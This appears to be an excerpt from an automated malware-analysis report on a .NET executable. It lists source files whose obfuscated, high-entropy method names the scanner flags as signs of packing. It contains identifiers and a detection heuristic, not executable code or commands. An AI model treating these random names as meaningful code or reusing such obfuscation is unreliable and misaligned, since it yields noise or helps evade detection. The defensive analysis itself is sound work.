Source: 4KjLUaW30K.exe, GZkZi6N25CU3ZM39Yj8.cs High entropy of concatenated method names: 'nx1mdWHWIW', 'Tk9mPwAvKc', 'mOJmKG8ZPq', 'nW54rVA31nZArZCoIeK', 'hljH01A2eVyNNZfBRtn', 'qoVHpkAIlrDQcMnG3tp', 'vaobcqAU4k4CbCPI62F', 'al5VQeAxlZa01H0MclA', 'aWrR4dALinSd85KKN5K', 'uREEBiA7VWoqMnMmLHF'
Source: 4KjLUaW30K.exe, NomT1BvPedyJf7edpoP.cs High entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
Source: 4KjLUaW30K.exe, jp8wrGYwREVGwsYMwhU.cs High entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'KwUTnbuoR4PGldwNALP', 'xxyP1NuEX0e95w2kSsK', 'vXH0hbuvbTjbAtWLEi8', 'iPocpUuVN1Hh3GEQce5', 'Hjw815u8xhj8q0ARU5D', 'I5cdavuhhUSVhObBTjO'
Source: 4KjLUaW30K.exe, sW4CwMvqMV4gjqDPAwt.cs High entropy of concatenated method names: 'P29', '_3xW', 'bOP', 'Th1', '_36d', 'EYp18egKX6', 'FX61crElb0', 'r8j', 'LS1', '_55S'
Source: 4KjLUaW30K.exe, U4V5YBYGovk0uMqoHJ7.cs High entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'VmZCwturZ0DAFBp31sy', 'RrWjpCu1YEZwB2w0iXH', 'AjqGfnu9xBTDfv8J9hG', 'NgmsP5uHIkD3R1eDC2X', 'tt6XSVu7ltV9PL3Zd1y', 'rZUO0Iuq1bxSDjtu5Yl'
Source: 4KjLUaW30K.exe, cZbENoh1wJqlr2AhSOG.cs High entropy of concatenated method names: 'KV8EtkDUGY', 'uDoEja6DTq', 'lyCEFQy7a3', 'zWByHlXYn3hcuemFsyO', 'CQUcaRXZppVHdTkllT4', 'xiMsUjXpiiVngS2qlvT', 'URbloXXjSPaT31q4idY', 'wpnE86IPUQ', 'S5gEcQHyjQ', 'RHtEUTU0wp'
Source: 4KjLUaW30K.exe, uLQtw4DjCF6t2UxoVc.cs High entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'kxlYHrPx9', 'VJpOdacIicGjkiFTiQe', 'EKxtXLcUSAKeYtBQivI', 'vi2p0vcxWnnSmAgUO6F', 'Ohasv7cLgsGUbMZuE5e', 'kpFnAtcogebqDCaQTJM'
Source: 4KjLUaW30K.exe, qGVWVXVcX8NWKRCo2ot.cs High entropy of concatenated method names: 'IGD', 'CV5', 'z28PoytanZ', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
Source: 4KjLUaW30K.exe, JTmi7Phv6kx1i2dVJ4u.cs High entropy of concatenated method names: 'CRn4x2EwsM', 'iNL4Yonrid', 'jTs4A4u3Uj', 'GZH4DfTEXG', 'Gor4p3VsxW', 'TGH4SUdQ2m', 'DE6V4pS9nT1vNhtm3G9', 'qJH8dPSr3rkcF3d3iXH', 'o1ceACS1y79tww8G6vF', 'bPxGBuSHI6juM6e0qgM'
Source: 4KjLUaW30K.exe, lYy1RQvGli2tI4sZE1P.cs High entropy of concatenated method names: 'vKhIFEbKhC', 'HRpI2n6CTd', 'jsXIR4PvFP', 'e1UIhoY4PG', 'FtMIu1pKYE', 'Qjy3JKQOPCXDirBIKOA', 'Lip3ZeQzjCK69AKpAku', 'l2dNmGQCpPGnkIo8kr2', 'tafuCUQFpyGdqOy5Fua', 'VhtTg9mtEWNE8stq2P9'
Source: 4KjLUaW30K.exe, SSDTYQvxTderYGV02mK.cs High entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
Source: 4KjLUaW30K.exe, noEFuEoZtF0ih1MJAd2.cs High entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'
Source: 4KjLUaW30K.exe, BGQkiUYt4cL9WgcAMao.cs High entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'GtaKDO4O6SXBLvvHQ4F', 'QL1xGN4z0Gm20CFIaey', 'BhMelVftPPk6Ixk4wfW', 'y9qNUSfwUaab4vTxcvB', 'CQX7IrfcUdEU5AycCOK', 'hjg4FcfKbixZmkKEc2E'
Source: 4KjLUaW30K.exe, TZRhjc3j8AVI92KwuP.cs High entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'jf2vR7T13LfN4SDiLmK', 'fdHHxKT9J8vqZT4k8vf', 'VEe9DwTHnmF6iups6yC', 'Ui9sBfT7CIU7nYD79E6', 'lhKHI4Tq538AC7KSgKM', 'BOALQTT3iGjgagAN1O7'
Source: 4KjLUaW30K.exe, zfXgCcvRD1gg8PMwoC0.cs High entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'tgjW6iKNqr', '_3il', 'cPJWbxUspF', 'ej6WmdaJ6o', '_78N', 'z3K'
Source: 4KjLUaW30K.exe, VTe1WqQ6fv8ByODS1e.cs High entropy of concatenated method names: 'PAKjujecx', 'W5yFfDmVT', 'N9F2s6nPJ', 'o8lI2ZwLAUHKqVQO4GP', 'iWafpfwUvyRmAvMZ9Sf', 'xAUsjWwxELifl1p1hsZ', 'AZOEKtwoynglCfffUif', 'xQ9cZTwEpPM4Th6RMu1', 'rSMZAOwvPU3tZS45RZk', 'RT3hNSwVuJuFadowy5N'
Source: 4KjLUaW30K.exe, R48lt4eCH3Oy6G2aIb.cs High entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'dtaWGYcDuGcjKuyhIMq', 'd1HHi3cAFsrfqrMy3ya', 'W0OKWncZ5KW8lZD7cfi', 'chpjYqcpgslTS7ZE3J7', 'lynsglcYwf2WYkAPkhZ', 'GHtXJrcjemlmrx606WI'
Source: 4KjLUaW30K.exe, cXcRQdYBFmdZUVELXAG.cs High entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 'mui3nb4t1037oJfoxZG', 'PbjHIG4wlZo0lTCGdo6', 'cBEJa24cMFojsEIEAKN', 'BS39lW4KvSxyHXGTIP1', 'hJgVps4Jaw2M7YeMOKN', 'iCQWuI4TXNsQxJccW48'
Source: 4KjLUaW30K.exe, WSVSP7oiICVvGc8XCjk.cs High entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'mrkdB4I6AR', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
Source: 4KjLUaW30K.exe, vx3b5yYWpgBl8P2iF9p.cs High entropy of concatenated method names: 'APumCymgdD', 'vTomBj9oIn', 'sxUmoWrTEp', 'zKvn6rADw75dLgB2skc', 'slPMb1AfZSBwCl9Cnk4', 'y1RrXpAgrZ3syhL7PaF', 'BMk1m5AAlkiIN2E9Qlf', 'wEjcGTAZwc3kr3meurE', 'FWBn4CApfRr4HX2geRd', 'wAR8tSAYdJLKuan4gqb'
Source: 4KjLUaW30K.exe, kfqrvqhb0xpH4vC6pmH.cs High entropy of concatenated method names: 'sg9', 'RBa7bWKigx', 'KTrri8C4ab', 'u1e7mM3awP', 'piF1j6k5742xkbMFo79', 'sBTYtAkl6dI2VUMbPE3', 'PhfROvkP1lyR9PYD4Am', 'x4lxtikyJ4IQB2ob6CJ', 'WjqULEkRpLjNsGxcTpV', 'OVbrgQknnnHVVC5Kfao'
Source: 4KjLUaW30K.exe, txRtxjA81moWKs4PQ9.cs High entropy of concatenated method names: '_88Z', 'YZ8', 'ffV', 'G9C', 'tAQmqNThZqo12AJe9u6', 'I5oaxCTyZ1FjGniXVCW', 'wfd2rrTRgXJMRHGd92s', 't1a6ptT5IYhEgrodY51', 'datkD3TlvkNTTW8dYQJ', 'yb4dRITP4VhjcfKfgQw'
Source: 4KjLUaW30K.exe, MyhoQnokJTBwKQQADqB.cs High entropy of concatenated method names: 'F1RoSyO9hU', 'tTOog86Yde', 'AnQoqQ20YO', 'u1IbulxESUkFuP7c4vy', 'Xq2BbcxL2YtO8qWRK7w', 'YVQWIXxonDtYrvykCXe', 'dXD5gKxv0IWOlIRiph8', 'jP6drSxV7lVXOGZgQ4g', 'tMkm6tx8xZhOpl1dNIX', 'm8JhFSxhkT0hrEZ1OaN'
Source: 4KjLUaW30K.exe, iCP6ulhRSDDwPgOVtLp.cs High entropy of concatenated method names: 'fWPr7SSIli', 'raLrtcbhhi', 'gST78tkMtZkj70hDLK1', 'Ww49AokSrZKVAB5GxnL', 'vAHi8GksFYpSFaq7T4o', 'lAuXVLkiLRsBiMrFsWG', 'M4l3pkke2Yw7vfUKOML', 'uXjvYQkX1vb5klP9EBo'
Source: 4KjLUaW30K.exe, V6dRp5Yxfuj08j3ek0a.cs High entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'zhT7FXuunZ0v82LLZwM', 'VjsNTDu4blyo0BElOBY', 'uSTXyFuf4R0ktyQ55mQ', 'iQBQ90ugRyxHpFMq9t1', 'Vui5dCuD2Ygk2V4ntXa', 'FdJdIduArRbrdCGNG2Q'
Source: 4KjLUaW30K.exe, UBMW4nh645gfcZltu8q.cs High entropy of concatenated method names: '_9YY', '_57I', 'w51', 'zOR7VYpIHp', '_168', 'j8ddRubQem7eLDPygdi', 'oaPICZbmFEeFmbdvS2c', 'OAxOqybrqN50k9tcVsy', 'UsvKvsb18LGSHjE2IbU', 'TrxO3bb9UtrU45lq96l'
Source: 4KjLUaW30K.exe, QFl6ClNMta2r0GnNZnF.cs High entropy of concatenated method names: 'fRcOiwcgLg', 'wchONhAsaN', 'RtAmOVYSDZhqZYfTyyi', 'i9ZaB5Yer3gv10pSIey', 'RAEsk3YX26cAhGq2e38', 'aarZWsYWkBWo1usM1Uh', 'hTSNO5YkAK9NJ4EaO3r', 'rjRL3nYbl0vtjouSV28', 'TXB7viYGk2vyIyT83O4', 'nj39uiYQR8weiYbrPje'
Source: 4KjLUaW30K.exe, QVc8plospLEndviF8ek.cs High entropy of concatenated method names: 'AYtL7XLTUQcD2L2NA1Z', 'fGPdErLduYPgkXbypf6', 'UJJW8ZLKCWc3N6EVYiX', 'bT5YRoLJSm6a2bBGNnZ', 'PgRVAmLugZdXeLXX2E3', 'yhOXqqL40GHC4yTOSkT', 'peXEUMLfWg5aQVvF69K'
Source: 4KjLUaW30K.exe, ryJsypNXZ9LmivXlBme.cs High entropy of concatenated method names: 'w3jHkVcdr7', 'gfvsrAsFJWylLaowgcX', 'IWM2aRsONDe6I96glg0', 'NvRT9csBCEUhKrrh4wg', 'U9vYSSsCkrJRJLcPLPv', 'fMTojKszPLfxTNV8v8B', 'vjJdFMit5vGTkJIhIYq', 'KXQxYfiwqTJtkIyuMcx', 'pgEcp3icVAu9agLAAgJ', 'adPK9ViKq0bvXa4Ms8h'
Source: 4KjLUaW30K.exe, GtMNQ9oWjF5rokB7pEh.cs High entropy of concatenated method names: 'FiCdvFVUva', 'Ay7dsTK0q8', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'ya6dkATQle', '_5f9', 'A6Y'
Source: 4KjLUaW30K.exe, UZfeDWh352lf1WhI2wp.cs High entropy of concatenated method names: '_269', '_5E7', 'uFh71utEwK', 'Mz8', 'UUj7c2w2dM', 'JoDxxpbniKVKJkhe8dA', 'no678LbN06Asyq1SRVU', 'gFSSgtb0b7aqhxq33i9', 'tFhqAmb66Rl83glsqj2', 'VyOe5NbBFGot9Jq2ATN'
Source: 4KjLUaW30K.exe, dAM0ED6eKKxhqovOZX.cs High entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'sjWBiTTd99mLNvFVb7R', 'ov70rmTuN0gqEflN0U8', 'F8FSt6T49KCm7Kuhebs', 'Ou26X0Tfm2IHUb9MO6J', 'N8Hya5TgbVJpjJrmgnI', 'C24CHrTDivKY8efo7SL'
Source: 4KjLUaW30K.exe, wXgP01pTMe3OFLIRrE.cs High entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'FVeuX7qD3', 'b27UNkcSG5vr76rVhYy', 'hMJ457cemTpWu4t4pAV', 'q9HT8TcX73GbXNVIPaq', 'S4bNEUcW5QGQlrcNDEX', 'XG5natckqHFQJk2hA7a'
Source: 4KjLUaW30K.exe, zHthOwoU2H99wIGWGaM.cs High entropy of concatenated method names: 'FmioTJplVA', 'uBkoedRi1E', 'HVEowuMh5u', 'YN5oZ1GTZh', 'kgSoydgTlH', 'POIoiZVRSY', 'QseI3fx5JOvy5t5Cqtj', 'V8XBsHxyZPrfvbDf3hq', 'nR205kxR3F13uAoZ24X', 'YcyKPVxlgZGMYalpL03'
Source: 4KjLUaW30K.exe, qWUFdgLPJ9XGvAyBIm.cs High entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'Ev2YkNKBwH2NgqRlmYC', 'qlrmeoKCfL14dAuBR6A', 'pvJahOKFfYgBn3F1RxJ', 'DTF2CZKOuBtvxjbeirW', 'n2siasKzZ9rI4pctZhX', 'r2R0wRJtWikQHbaNJmY'
Source: 4KjLUaW30K.exe, G56Q3aYjrdEuFu5v4iR.cs High entropy of concatenated method names: 'rRAbksCkAc', 'qA6i714iWrcodeJJLMk', 'WNae9V4MsFK4pq7GryL', 'llNpFx4a2nLd1jJkeE6', 'X53urV4sh90p7D9w6q3', 'TZuWKE4Su6491U3AQUc', 'gMKBY44e2oONnKngXRL', 'gnxLDF4X33AUh9e9TUZ', 'OOiEyi4WETcLE6Z1yqi', 'f28'
Source: 4KjLUaW30K.exe, RBD6wFhjy2wGJtRcNcy.cs High entropy of concatenated method names: 'TCLr84Og1Y', 'TQgrcrXChp', 'g8yrUdm96b', 'cKDYi4W80GNCKXWNi4P', 'Oi0X6EWvVMZlE7AMV9g', 'UKYR1xWVVkAaGXrjGTQ', 'wAPxirWhlHgXP4MQ9s9', 'g7PrQVXsCV', 'f8dr4WpOAS', 'sc5rECpRZs'
Source: 4KjLUaW30K.exe, Bkav7OY7VINUKrFphcS.cs High entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'x2ElRj4R9pabdYEHETn', 'lLi8BT45JKgvKNaMEo4', 'RbfW5e4lQhPSh5jNejb', 'u7JAJW4P6F8tVPAMDid', 'XW1cSg4nNJ9fslb7xbn', 'o52i3b4N3pGSYpr4VPQ'
Source: 4KjLUaW30K.exe, KJqbCiNLCBjBf6h1Qyi.cs High entropy of concatenated method names: 'YtKQEZyJlB', 'xqRQr8JiCi', 'WOJunMi6qJ4KLWi1378', 'PK16MviB9JnunZMMlNB', 'AGWXWXiNYlDfHRm0WXp', 'M54gEYi0h01K5XxidOl', 'IhEQUuBK06', 'F3PJqlMtX7CoCfQrHlb', 'OaGXGkMwaUZxMa4nJyq', 'SdWm1LiOQItAwiVaYUe'
Source: 4KjLUaW30K.exe, EdEYWwVqYP6pZ9APAub.cs High entropy of concatenated method names: 'lw1kCqugYC', '_1kO', '_9v4', '_294', 'SmAkBKVmXI', 'euj', 'Mxyko3XE9G', 'zLAkdeewwZ', 'o87', 'z1wkPZ6Xrh'
Source: 4KjLUaW30K.exe, vZIQUINSw5pKTm7SZuU.cs High entropy of concatenated method names: 'eNGnWuXnS5', 'B9En1XHfAo', 'fsTsDCjGuuRfVulcpZP', 'f0MPbjjQNJrbQW9uE0P', 'qNikBDjkEjiQeu13aI0', 'pJ4owjjbwt2C8Ly4oMQ', 'hNmi1JjmOBfKHKECeO1', 'PgN5cujryJEMtGcpUWq', 'OyKBbCj16RPjC81CPpb', 'iBdtmVj9SgYXIJsFgwP'
Source: 4KjLUaW30K.exe, UibesEvlqBKHivm7nup.cs High entropy of concatenated method names: 'fdm0t9kLT7', 'LHi0jZATkg', 'ewW0FkfS46', 'J9c02PvvDu', 'RSn0RnB1fd', 'gSXIahmIHRxecuAaPHe', 'PiqbwDmUxSSNran9Wd7', 'TrGv8Em3BhixP73vQIX', 's5W9Otm2XsMXTqbERVG', 'WXqNemmx2fd4eRvwfsl'
Source: 4KjLUaW30K.exe, tDGifrgvT5UcySYpdI.cs High entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'cmgEWjKUVrV37NjGKRV', 'wOIH3eKxo7uYSrE6xib', 'R5BZhlKLOcJAOXQpNwk', 'VWcT6IKooefh5Pe1Sa4', 'UHpHBcKEoGBBMtYFiCE', 'WdD1WMKvHFt6BUHYKUD'
Source: 4KjLUaW30K.exe, HWFQk8NwpxJpfT758VC.cs High entropy of concatenated method names: 'faMOZ6k95W', 'pplfGJYKDq2se3bSljL', 'X5A2x0YJbEONNHmkH38', 'm6wIWqYwbRmiAj6FYuf', 'URRC52YcgQOCSSqowV8', 'Pdy6IUYTrysiy6JfkGI', 'fbHoeMYdHI31dKHqhj3', 'NBXukoYuvPnFUNr9ZRP', 'ooQ4sVY4KrJmKujSYTN', 'mUQVClYf9SWd3S1DhCD'
Source: 4KjLUaW30K.exe, NOPLVwY9MfD4AfFGHpJ.cs High entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'RPkLlpDq8HFPTfoevlW', 'h0ODQxD344GFmaYFd2Z', 'vobGmqD2bHjGRvsKPqp', 'pJ2vxUDIkPaLSolVRsX', 'LR7nUQDUGJjJI7Mwv6K', 'NZbB4dDxVFyDWMDcLQM'
Source: 4KjLUaW30K.exe, vUoheHY8wOZQoIG9xMg.cs High entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'CFlbmZuSxEJ2PL4ngHS', 'ptWlBxuef195RmNBaf0', 'SntJM5uX048lO76gOM8', 'Wv2uXGuWmYI7vBGtjun', 'dqjElWukXNEMtpx0YCM', 'klWhGaubnrklmoY57rV'
Source: 4KjLUaW30K.exe, yB1t4PNxmGUAD4XHP1t.cs High entropy of concatenated method names: 'fbrO7TvBsL', 'UsLOt232B5', 'bCNOjPtfHL', 'fEQOFI6TvB', 'uUaO2hOP6L', 'ralORm9lr8', 'HiwOhoEeX2', 'b14G1lpGpeUJPKqBKKU', 'hULNxkpkWcHAvUy6Qt3', 'JEJAkLpbeehFkQL3lkq'
Source: 4KjLUaW30K.exe, FmGS1khGaFOQXlbKwnr.cs High entropy of concatenated method names: '_223', 'HE3B63Xi7he89diCqDA', 'bOyZOcXMR4ueL4NOfbh', 'xNMhsCXS6VTxFkLaACo', 'KZQrxZXeR7LuKZsaJNw', 'GOrYAuXXEWmNX9ODLrA', 'WMU4gvXWSqshJwDOSyL', 'UHGkwAXkUtA30h0YQTV', 'eL46uFXb8Sb3opgG1J8', 'iFB0F1XGAlZrhyuo6OU'
Source: 4KjLUaW30K.exe, ruvAvkVnoUMmYw94IgV.cs High entropy of concatenated method names: 'BO9Kr4VUQW', 'IVoKVyxSNY', 'fDhK3iD9D5', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'udrKIyBc7k'
Source: 4KjLUaW30K.exe, aDkKhnIWvc0qVL2oqa.cs High entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'RiKMPUcF2RCaEjnSiO9', 'eBFFY3cOsYc3ghrYu33', 'Nes7nEczmOoSZFrnjVg', 'fTZ88uKtrPmm33pAn5x', 'HGGB6DKwwabXfw7O9Qw', 'hIiPwYKcuQ28wSVksHA'
Source: 4KjLUaW30K.exe, UFqogdYkuehTYh8Iphd.cs High entropy of concatenated method names: 'VawbDX8vfI', 'j6grTegcoZiZCt0lxaF', 'Co8lJsgKvrY3N2WdfVZ', 'RaAW2UgtQRR35nZOpNU', 'B3SCiwgwawXwxxcjKqV', 'kbmiGdgJZArElZtfgTs', 'nAfQepgTr388RUrbuwt', 'cPh2tZgd26XuL0tx6Nc', 'PFFbSuSy0g', 'H0puHEgf5h1eoYAiKDV'
Source: 4KjLUaW30K.exe, l5xYCoNNdMvgNe1ZSSD.cs High entropy of concatenated method names: 'cCFmSlNXWW', 'SwlmgqL6xO', 'RGomqn4sap', 'DROmX520Rq', 'Y91mTub7va', 'tVPmeRxHv3', 'PuM8wKZiuTeMwJ4559E', 'IvWYfYZMNxLIRti9CDm', 'uEet8LZaIYrNIjo8XtY', 'wMlF52ZsYSgo8Isq3HX'
Source: 4KjLUaW30K.exe, lJkRa7VVH3g1b2ugmn7.cs High entropy of concatenated method names: 'Qkp', '_72e', 'R26', '_7w6', 'Awi', 'n73', 'cek', 'ro1', '_9j4', '_453'
Source: 4KjLUaW30K.exe, LjX5DMhF3iXAFYiUD2O.cs High entropy of concatenated method names: 'oYo', '_1Z5', 'xaI74xN414', 'QRmVnWLesn', 'pUP7EJZ6ML', 'TvShyVbpi4RegB9SXyL', 'HhRWZ9bYgghELVWAxd6', 'Nv5G34bjWHAmjRaSyVh', 'g8GJeebaPuRmT2XbgYb', 'GCf957bsd4Gyyl89cyt'
Source: 4KjLUaW30K.exe, QgTJm9Yf7rn7degfOws.cs High entropy of concatenated method names: 'y6fmbCvDpt', 'q2qmmlTR1c', 'in5mOxX6gj', 'spyDxSgncPm1ISRiZhA', 'SnpiNAgN5HYd10bquNS', 'SD7DuuglRhQriJQfKFL', 'cqhBJMgPWjQUwjSGGHd', 'CNRvp2g0sbmf631Nks8', 'XQPYgig6OKLuXflQMSF', 'w3enfTgB3YsHkoae4bu'
Source: 4KjLUaW30K.exe, f4jwlMvMT2PGg14hB0C.cs High entropy of concatenated method names: 'VDm0ngFVQ1', 'oZv0HpsZEp', 'oW40QoDcge', 'e99lfDmstEuI3ELc2AA', 'r0Mry6miXDOZTZjH6Fu', 'tF4Y6FmjaUjHNKTkHkN', 'w5RY6GmaxOhXt1Ypuv0', 'jnkY01mMKHORe9uFUUa', 'CVtATUmSQR0isGINMEt', 'Id8YRtmeVZDclENyPPi'
Source: 4KjLUaW30K.exe, eGkaX4ohNpFNeK8GuW0.cs High entropy of concatenated method names: 'mbnVNN3k6ZTryoMENqv', 'pEh8ko3bAldRJIBi6Le', 'qm78w23XXC5CKI2QP8q', 'z8o2DK3WLTDM1OoZxTa', 'WJeloR7pb1', 'DsMIMi3mkvPZ8PnrAlm', 'zg8TUs3rjt7tJ3hcvds', 'zMfhr13G51voqXorV8c', 'z8EBBW3QKKAJGcjLMtm', 'vxEOtK31Eh1O9NdDO6o'
Source: 4KjLUaW30K.exe, L51LOHYhmkeHGDgBwYi.cs High entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'zTrh0qdHdHTXge7eUE4', 'e3fnohd7sSpZVZLYTbR', 'aHLdxEdqoln8iX2AsqP', 'Pxs37Hd3Pl5wfdrw3Vm', 'nMPrjFd2uPbZdaVoeDJ', 'GZBlKydInONhePyniVI'
Source: 4KjLUaW30K.exe, ro97oDVuP8MRY6VDPO5.cs High entropy of concatenated method names: 'PJ1', 'jo3', 'PyZkrgxT8n', 'NsGkVOPAHm', 'NiTk3LkAU0', 'EC9', '_74a', '_8pl', '_27D', '_524'
Source: 4KjLUaW30K.exe, m7AOddYYBHLKaXxNx0u.cs High entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'H6nLuKdSrPfFCOHL9M7', 'FskR1QdejrHdmFgAWgE', 'zI2vXfdX7Bx8d9X303u', 'L1N2xBdWgjkG79QtXKW', 'OBMmlAdkd8nQXiLbEQ8', 'khDnO0dbxcogwJw2lZC'
Source: 4KjLUaW30K.exe, DBx1HnV2WnrVt2OJGyF.cs High entropy of concatenated method names: 'YSHdDfqNyH', 'fD4dprsNW0', 'XFndS3HFEy', 'IF6dgvx3qu', 'oSBdqOY4l3', 'ELVdXu398q', '_838', 'vVb', 'g24', '_9oL'
Source: 4KjLUaW30K.exe, Ix3CD7hz2XViRj9ALf4.cs High entropy of concatenated method names: 'McdVvZTR8m', 'OMiVshPk38', 'aLaVktfNje', 'MSc3PcGvJKjSkQ3tyRy', 'iHm4EBGVUeyGa4R7X7e', 'I9ZGkDGomLVfeIa7mau', 'YDgjDCGEWVZTRehKviy', 'UjakEdG8Jajep6FkLtO', 'x97gb4Gh5VP11xHh3TX', 'EeWp6XGy8u991gsDllC'
Source: 4KjLUaW30K.exe, cgK5tx073ISY2GMw4Av.cs High entropy of concatenated method names: 'bhHfodJfIg', 'I4jfd6DIlS', 'xH8fP2Co7t', 'GwdfKho5ix', 'sNafv4pw4C', 'p7rfsc4AAF', 'HIbfkU6tkL', 'vrUf54jieZ', 'r5PffQnuMd', 'uyLf7y7HqT'
Source: 4KjLUaW30K.exe, ioFwL1v8caA9ieoNYeJ.cs High entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
Source: 4KjLUaW30K.exe, QdvVFvonJ8EHJd5eisu.cs High entropy of concatenated method names: 'uL8oAuycva', 'S1loDDlgwy', 'CKjopgWJEP', 'bniwwRxIMeavPujc7Lx', 'R103rbx35oKeKksE1Vw', 'owVDdGx2Amttapu7DN9', 'nkPyv2xUTDaZO2NviDA', 'KIB4qJxx5G0QiL0kByu'
Source: 4KjLUaW30K.exe, WUVpqxvyRygJs1qU9gS.cs High entropy of concatenated method names: 'o1QtMZmhne8tCOAgUix', 'El0Vvhmysuc9iRSCFhB', 'gm6bj9mR4BLph5tGWbf', 'c81w5LmVTwF2JlPni0y', 'wpsfAGm8vIlqyXKl2a1'
Source: 4KjLUaW30K.exe, aFsJ9BNaQQe4ARmMM03.cs High entropy of concatenated method names: 'P9VOz5viWr', 'fBCn6AP0RB', 'OSGnb6qPWe', 'yk4nm6g4Mw', 'kMFnOx2TRI', 'WM3nnNP6sD', 'exhnHoI8qH', 'dW0nQSODGr', 'l7tn4N0ceE', 'taZnEnxWqJ'
Source: 4KjLUaW30K.exe, mn3GMyPpG7d9Sd2Ib0.cs High entropy of concatenated method names: '_52U', 'YZ8', 'M5A', 'G9C', 'HvX5JuT0P0L3ENISi5y', 'tNxV5RT6PdvZXVFZtOR', 'gGVX7FTBtAvXphnQcSZ', 'PGegLlTChX30HQbxW4i', 'bEpaPoTFIMMamptVvXj', 'G011I8TOnINfxer3NiN'
Source: 4KjLUaW30K.exe, lkg8fQYgQoTlXZs27lw.cs High entropy of concatenated method names: 'uVPbiVvnY8', 'RQxZe9gxXv9PlyCHny7', 'ANVKhXgLIQHpBQb7qsF', 'r7JDTfgIy29mJ6C8ce7', 'TTfEErgUIDdLfXEARlv', 'jJtw97goK7DWR7i6VUj', '_3Xh', 'YZ8', '_123', 'G9C'
Source: 4KjLUaW30K.exe, CvrVDt0VyUBWHJ8alr.cs High entropy of concatenated method names: 'ihMWFXbtE', 'Eqy2NK3vpp1rHo6s8s', 'UDmlFI7FVatqQAWIEC', 'qRBaahqX24bf9Q0xRT', 'k2pIGt29DyZZjTEsfQ', 'SZAG5uIGqmsdywVCYp', 'VZJmm3DLq', 'eWvODj1Oq', 'uXWnFrFu6', 'ShlHfKgDk'
Source: 4KjLUaW30K.exe, DQ3NDiFO17MTmARerf.cs High entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'oem9NJJ8Eu0Z9okC2ln', 'nT899bJhSVhqJCep13w', 'LospAnJyZJwcxJZrcfs', 'iPG7e3JRxlLJHBoYEdP', 'UoNffCJ5QBVx4epQIep', 'iKWuxuJlwqhEnAFye90'
Source: 4KjLUaW30K.exe, i2y7PFhOWho2UcX1fPj.cs High entropy of concatenated method names: '_525', 'L97', '_3t2', 'UL2', '_6V2', '_968', 'qcONDtkpUtB5ppk9vMP', 'hIiAhUkYgVVLkCty2QG', 'p3j2RGkjBWTOrbnfPrU', 'rXlsipkamKqjmjygTNh'
Source: 4KjLUaW30K.exe, y2TLYTvtFeNuhVMFdsa.cs High entropy of concatenated method names: 'IXAWtQiHSG', 'nAhWj2lG3x', 'yFuWFNsUh5', 'sb2W2yGZDS', 'RqRWRFXreA', 'TCAPb5rSZlm80n33O1C', 'd451qBriGVbtJkNQtPr', 'ebZHTBrMJ0NEjcL0gWc', 'bw1FJ7reiQtcllSLxkW', 'F11txDrXHgYwh9pGbRp'
Source: 4KjLUaW30K.exe, NunncDvaaNLkdtc3tU2.cs High entropy of concatenated method names: '_7zt', 'XlU0av2GvX', 'MYY0lwCHH1', 'Yqv0JkhrhY', 'B1Y0LlUbd8', 'hJs0CpTQaY', 'QrJ0BNHqV0', 'kNfNlkmkpOLQlTNQGtE', 'Ib04f9mbhSjW7uQPx78', 'lvtBxFmX0Ks9XPncoBf'
Source: 4KjLUaW30K.exe, DtAqWTyjCiljRTrdGU.cs High entropy of concatenated method names: 'CjlokXvqc', 'rLVd1mfgI', 'DeZPo9dM2', 'uFhKutEwK', 'vdTvBqQA3', 'UUjs2w2dM', 'yGEk4Cylm', 'YCfTCLw4pggRoZYAhjl', 'ymjCSLwfoQV45BIkue0', 'Je8JefwgoYYaFwTH0WW'
Source: 4KjLUaW30K.exe, aynC04VDjKkDqjcdke9.cs High entropy of concatenated method names: 'Uwgg5p8Jd5w3rIJbtEd', 'S1QFrr8TrcAmRE3Geba', 'F7bWrh8c7kelM1eXfnS', 'mNt1ii8KIwEfI0J23w0', 'sDmKjo5EZu', 'WM4', '_499', 'YlmKFuSjkm', 'TcjK2OhQWI', 'J05KRlqYCC'
Source: 4KjLUaW30K.exe, ATfjckh9fVmW7HmlyIP.cs High entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'EVMV3R4orF', 'rLV701mfgI', 'HBBVIbpchw', 'DeZ7Wo9dM2', 'YhFbt4bLEl2nhSamiG8', 'd89l9ZboHLDsCejnePb', 'jikTR5bUdp6KwpeBina'
